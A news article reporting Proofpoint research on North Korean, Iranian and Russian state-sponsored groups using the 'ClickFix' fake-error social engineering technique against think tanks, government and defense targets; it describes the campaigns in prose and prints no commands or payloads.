State-sponsored cyber groups are flocking to the 'ClickFix' social engineering technique
ClickFix is being used to target think tanks, government, and defense firms
State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster - but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea's TA457, Iran's TA450, and Russia's UNK_RemoteRogue and TA422 have all been making use of it.
"This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution," said Proofpoint.
Rather than revolutionizing their campaigns, the technique is replacing the installation and execution stages in existing infection chains. While it's currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea's TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Sign up today and you will receive a free copy of our Future Focus 2026 report - the leading resource for IT decision-maker insight on priorities and investment areas in AI, security and more.
Iran's TA450, meanwhile, used an attacker-controlled email address - support@microsoftonlines[.]com - to send an English-language phish to targets at more than 39 organizations in the Middle East.
They deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges, then copy and run a command contained in the email body. Doing this installed remote monitoring software, allowing the group to conduct espionage and exfiltrate data from the target’s machine.
ClickFix abuse expected to surge
UNK_RemoteRogue has only used ClickFix once, researchers said. Notably, however, none of the aforementioned groups showed repeated use of the technique.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
"Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations," said the firm.
"However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time."
MORE FROM ITPRO
- The Iran cyber threat: Breaking down attack tactics
- Russia is targeting unpatched vulnerabilities – what can tech leaders do to shore up defenses?
- North Korean insider attacks are skyrocketing – dozens of US firms didn't spot the hacker in their midst
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.
-
AWS hits back at EU cloud 'gatekeeper' designation hintsNews Gatekeeper designation under the legislation would force AWS and Microsoft to make concessions
-
Is the Top500 meaningless? Not so, says US national laboratory CTOIn-depth LINPACK may measure only one process, but there are real and meaningful use cases for exascale systems
-
‘They risk damaging confidence’: A Canadian health board outraged staff with phishing tests offering paid leave – experts say it shows why you need to be careful with cyber awareness campaignsNews Phishing tests require a delicate touch, emulating realism while not “exploiting goodwill”
-
Hackers are capitalizing on AI hype to ramp up social engineering attacks – and they're using big brands like Anthropic, OpenAI, and DeepSeek as ‘bait’ to lure victimsNews Microsoft says cyber criminals are impersonating popular AI platforms to deliver malware
-
Two US nationals sentenced for role in prolific fake worker laptop farmsNews The Americans were raising money for the North Korean regime by allowing fake IT workers to appear as legitimate US-based employees
-
Beware of emails threatening a code of conduct reviewNews A widespread phishing campaign has targeted tens of thousands of employees
-
Microsoft and NCSC issue alerts over hacker campaigns targeting WhatsApp, Signal messaging appsNews Microsoft warns about a sophisticated attack that starts with WhatsApp messages, while the NCSC says such incidents are on the rise
-
Is your new hire an AI clone? Microsoft says North Korean hackers are using AI to impersonate job seekers and steal company secretsNews The groups are increasingly using face-changing or voice-changing software to make their fake identities more plausible
-
Google issues warning over ShinyHunters-branded vishing campaignsNews Related groups are stealing data through voice phishing and fake credential harvesting websites
-
Thousands of Microsoft Teams users are being targeted in a new phishing campaignNews Microsoft Teams users should be on the alert, according to researchers at Check Point
